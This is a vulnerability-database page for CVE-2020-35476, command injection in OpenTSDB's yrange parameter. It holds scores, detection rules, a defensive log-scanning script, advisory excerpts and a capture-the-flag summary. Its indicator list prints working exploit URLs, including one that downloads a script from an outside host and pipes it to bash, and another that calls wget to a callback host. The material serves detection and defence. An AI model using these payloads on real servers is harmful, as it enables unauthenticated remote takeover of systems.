CVE-2020-35476
Published 2020-12-16
Priority: P1 · 90 · critical · CVSS 3.1: 9.8
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Status: ITW exploit · VulnCheck KEV · Exploited in the wild
EPSS: 85.33% (99.7th percentile)
A remote code execution vulnerability occurs in OpenTSDB through 2.4.0 via command injection in the yrange parameter. The yrange value is written to a gnuplot file in the /tmp directory. This file is then executed via the mygnuplot.sh shell script. (tsd/GraphHandler.java attempted to prevent command injections by blocking backticks but this is insufficient.)
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| opentsdb | opentsdb | <= 2.4.0 | — |
| opentsdb | opentsdb | 1.0.0 – 2.4.1 | — |
Detection & IOCs (extracted from sources)
- URL: /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://{{interactsh-url}}%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
- URL: /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=[33:system('curl${IFS}http://10.10.14.14:8000/rev.sh|bash')]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
- URL: http://opentsdbhost.local/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system('touch/tmp/poc.txt')]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
- Detect exploitation attempts by matching HTTP GET requests to the OpenTSDB /q endpoint whose 'yrange' parameter contains the substring 'system(', indicating OS command injection.
- Alert on HTTP responses from the OpenTSDB /q endpoint whose JSON body contains all three of 'plotted', 'timing' and 'cachehit'; this confirms that the exploit request triggered a successful graph rendering.
- The Metasploit module first queries the OpenTSDB version API before exploitation; monitor for sequential requests to the OpenTSDB version/API endpoint followed by a /q request with a yrange parameter containing bracket-enclosed system() calls.
- The injected command in yrange uses the pattern [33:system('...')]; look for URL-encoded or plaintext occurrences of 'system(' within the yrange query parameter of requests to /q.
- The CVE-2020-35476 fix is incomplete; the regex validation on the query API can be bypassed. Inspect all parameters of the legacy HTTP query API (/q), not just yrange, for crafted OS command injection patterns.
- The vulnerability is exploitable without authentication; no credentials are required to trigger the yrange command injection via the /q HTTP API endpoint.
- The original CVE-2020-35476 fix was incomplete; a bypass (tracked separately) exists where crafted commands evade the regex validation added to the query API.
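The detection guidance above, as an added example that is not from this page or any of the sources it lists: the check runs over constructed access-log lines (the log format, client IPs and payloads are made up), isolates the yrange parameter of /q requests, normalises percent-encoding and flags any value carrying a system( call.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not real traffic): a benign graph request,
# a plaintext injection, a URL-encoded injection and an unrelated request.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Oct/2020:10:00:01 +0000] "GET /q?start=1h-ago&m=sum:sys.cpu.nice&yrange=[0:100]&json HTTP/1.1" 200 512
10.0.0.6 - - [21/Oct/2020:10:00:02 +0000] "GET /q?start=1h-ago&m=sum:sys.cpu.nice&yrange=[33:system('id')]&json HTTP/1.1" 200 512
10.0.0.7 - - [21/Oct/2020:10:00:03 +0000] "GET /q?start=1h-ago&m=sum:sys.cpu.nice&yrange=%5B33%3Asystem%28%27id%27%29%5D&json HTTP/1.1" 200 512
10.0.0.8 - - [21/Oct/2020:10:00:04 +0000] "GET /api/version HTTP/1.1" 200 64
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# gnuplot function call smuggled into the range, e.g. [33:system('...')]
INJECTION_RE = re.compile(r"system\s*\(", re.IGNORECASE)

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def flag_yrange_injection(log_text):
    """Return (line_no, client_ip, decoded_yrange) for /q requests whose yrange holds a system( call."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != "/q":
            continue
        # parse_qs already percent-decodes once; decode_fully catches nested encoding
        params = parse_qs(parts.query, keep_blank_values=True)
        for raw in params.get("yrange", []):
            decoded = decode_fully(raw)
            if INJECTION_RE.search(decoded):
                hits.append((line_no, line.split(" ", 1)[0], decoded))
    return hits

if __name__ == "__main__":
    for hit in flag_yrange_injection(SAMPLE_LOG):
        print("ALERT line %d from %s: yrange=%s" % hit)
```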
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| GHSA | — | 9.8 | CRITICAL | — |
| OSV | — | 9.8 | CRITICAL | — |
| VulnCheck | — | 9.8 | CRITICAL | — |
OSV · 2023-05-03 · CVSS 9.8
CVE-2023-25826 [CRITICAL] Command injection in OpenTSDB
Due to insufficient validation of parameters passed to the legacy HTTP query API, it is possible to inject crafted OS commands into multiple parameters and execute malicious code on the OpenTSDB host system. This exploit exists due to an incomplete fix that was made when this vulnerability was previously disclosed as CVE-2020-35476. Regex validation that was implemented to restrict allowed input to the query API does not work as intended, allowing crafted commands to bypass validation.
GHSA · 2023-05-03 · CVSS 9.8
CVE-2023-25826 [CRITICAL] CWE-78 Command injection in OpenTSDB
Description as in the OSV entry for CVE-2023-25826 above.
OSV · 2021-08-02
CVE-2020-35476 [CRITICAL] OS Command Injection in OpenTSDB
Description as given at the top of this page.
GHSA · 2021-08-02
CVE-2020-35476 [CRITICAL] CWE-78 OS Command Injection in OpenTSDB
Description as given at the top of this page.
VulnCheck · 2020 · CVSS 9.8
CVE-2020-35476 [CRITICAL] opentsdb opentsdb Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Description as given at the top of this page.
Affected: opentsdb opentsdb
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-21&host_type=src&vulnerability=
No detection rules found.
Nuclei · CVSS 9.8
CVE-2020-35476 [CRITICAL] OpenTSDB <=2.4.0 - Remote Code Execution
OpenTSDB 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
Template:

```yaml
id: CVE-2020-35476

info:
  name: OpenTSDB <=2.4.0 - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: |
    OpenTSDB 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  impact
```
Metasploit · CVSS 9.8
CVE-2020-35476 [CRITICAL] OpenTSDB 2.4.0 unauthenticated command injection
This module exploits an unauthenticated command injection vulnerability in the yrange parameter in OpenTSDB through 2.4.0 (CVE-2020-35476) in order to achieve unauthenticated remote code execution as the root user. The module first attempts to obtain the OpenTSDB version via the API. If the version is 2.4.0 or lower, the module performs additional checks to obtain the configured metrics and aggregators. It then randomly selects one metric and one aggregator and uses those to instruct the target server to plot a graph. As part of this request, the yrange parameter is set to the payload, which will then be executed by the target if the latter is vulnerable. This module has been successfully tested against OpenTSDB version 2.3.0.
Fortinet (blogs_fortinet) · 2022-10-21 · CVSS 9.8
CVE-2022-22954 [CRITICAL] Mirai, RAR1Ransom, and GuardMiner – Multiple Malware Campaigns Target VMware Vulnerability
FortiGuard Labs Threat Research
By Cara Lin | October 21, 2022
In April, VMware patched a vulnerability, CVE-2022-22954. It causes server-side template injection because of the lack of sanitization on the parameters “deviceUdid” and “devicetype”. It allows attackers to inject a payload and achieve remote code execution on VMware Workspace ONE Access and Identity Manager. FortiGuard Labs published a Threat Signal Report about it and also developed an IPS signature in April.
We have observed attacks in the wild since then. Most of the payloads focus on probing a victim’s sensitive data, for example passwords, the hosts file, etc. But in August, there were a few particular payloads which caught our interest. They had th
Tenable (blogs_tenable) · 2021-11-18
Identifying Server Side Request Forgery: How Tenable.io Web Application Scanning Can Help
CTF (ctf_writeups) · CVSS 9.8
CVE-2021-21311 [CRITICAL] AdmirerToo / README
# AdmirerToo - HackTheBox - Writeup
Linux, 40 Base Points, Hard
## Machine
## TL;DR
To solve this machine, we begin by enumerating open services using ```nmap``` – finding ports ```22``` and ```80```.
***User***: By reading the HTML source of ```403``` pages we found the vhost ```admirer-gallery.htb```, found ```Adminer``` on ```db.admirer-gallery.htb```, found the Adminer SSRF (```CVE-2021-21311```), used the SSRF to access internal port ```4242``` and found that it is ```openTSDB```, used ```CVE-2020-35476``` to get RCE and a reverse shell as the ```opentsdb``` user, enumerated and found ```/var/www/adminer/plugins/data/servers.php```, which contains the password of the ```jennifer``` user.
***Root***: Found ```fail2ban``` and ```openCATS``` running on the target machine on port ```8080```,